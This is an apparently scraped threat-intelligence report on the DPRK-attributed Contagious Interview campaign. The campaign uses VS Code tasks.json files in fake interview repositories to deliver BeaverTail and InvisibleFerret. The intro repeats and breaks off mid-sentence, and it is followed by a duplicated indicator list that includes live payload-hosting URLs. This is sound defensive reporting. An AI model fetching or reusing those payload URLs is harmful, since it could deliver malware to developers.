Contagious Interview: Tracking the VS Code Tasks Infection Vector
Contents
Executive Summary
The DPRK-attributed Contagious Interview campaign continues to target software developers through fake recruitment schemes disguised as technical assessments and code reviews of projects hosted on platforms like GitHub. A relatively new technique in the campaign's arsenal leverages Microsoft Visual Studio Code task files (located at .vscode/tasks.json
) to achieve malicious code execution upon project open. This report documents our observations tracking this vector, presents GitHub-based discovery methods, highlights unique findings including a newly published malicious Node Package Manager (NPM) package, and outlines detection opportunities for defenders.
Background
Recent reporting from the security community has documented the campaign's adoption of VS Code task files as an infection vector, ultimately leading to deployment of the BeaverTail downloader and InvisibleFerret backdoor:
- Open Source Malware documented various types of repos containing malicious tasks files, associated "code puppets", and a marked reliance on Vercel domains for payload hosting.
- Red Asgard published detailed C2 infrastructure analysis and some …
The DPRK-attributed Contagious Interview campaign continues to target software developers through fake recruitment schemes disguised as technical assessments and code reviews of projects hosted on platforms like GitHub. A relatively new technique in the campaign's arsenal leverages Microsoft Visual Studio Code task files (located at .vscode/tasks.json
) to achieve malicious code execution upon project open. This report documents our observations tracking this vector, presents GitHub-based discovery methods, highlights unique findings including a newly published malicious Node Package Manager (NPM) package, and outlines detection opportunities for defenders.
Background
Recent reporting from the security community has documented the campaign's adoption of VS Code task files as an infection vector, ultimately leading to deployment of the BeaverTail downloader and InvisibleFerret backdoor:
- Open Source Malware documented various types of repos containing malicious tasks files, associated "code puppets", and a marked reliance on Vercel domains for payload hosting.
- Red Asgard published detailed C2 infrastructure analysis and some …
IoC
http://cluster0.exkxkun.mongodb.net/reactjs-food-delivery-app
http://regioncheck.xyz
http://jsonsilo.com
https://www.regioncheck.xyz/settings/mac?flag=8
https://vscodesettingstask.vercel.app/api/settings/windows
http://vscode-load.onrender.com
https://github.com/dmbruno/card-activity
http://www.regioncheck.xyz
https://www.regioncheck.xyz/settings/linux?flag=8
http://hotmail.com
http://pastebin.com
http://api.npoint.io
https://www.jsonkeeper.com/b/QJZCG
http://urlscan.io/dom/019bdb75-40cb-7548-abd5-4558496217d5/
http://www.vscodeconfig.com
http://jsonkeeper.com
https://vscode-toolkit-bootstrap.vercel.app/settings/linux?flag=306
https://www.regioncheck.xyz/settings/windows?flag=8
[email protected]
[email protected]
[email protected]
http://regioncheck.xyz
http://jsonsilo.com
https://www.regioncheck.xyz/settings/mac?flag=8
https://vscodesettingstask.vercel.app/api/settings/windows
http://vscode-load.onrender.com
https://github.com/dmbruno/card-activity
http://www.regioncheck.xyz
https://www.regioncheck.xyz/settings/linux?flag=8
http://hotmail.com
http://pastebin.com
http://api.npoint.io
https://www.jsonkeeper.com/b/QJZCG
http://urlscan.io/dom/019bdb75-40cb-7548-abd5-4558496217d5/
http://www.vscodeconfig.com
http://jsonkeeper.com
https://vscode-toolkit-bootstrap.vercel.app/settings/linux?flag=306
https://www.regioncheck.xyz/settings/windows?flag=8
[email protected]
[email protected]
[email protected]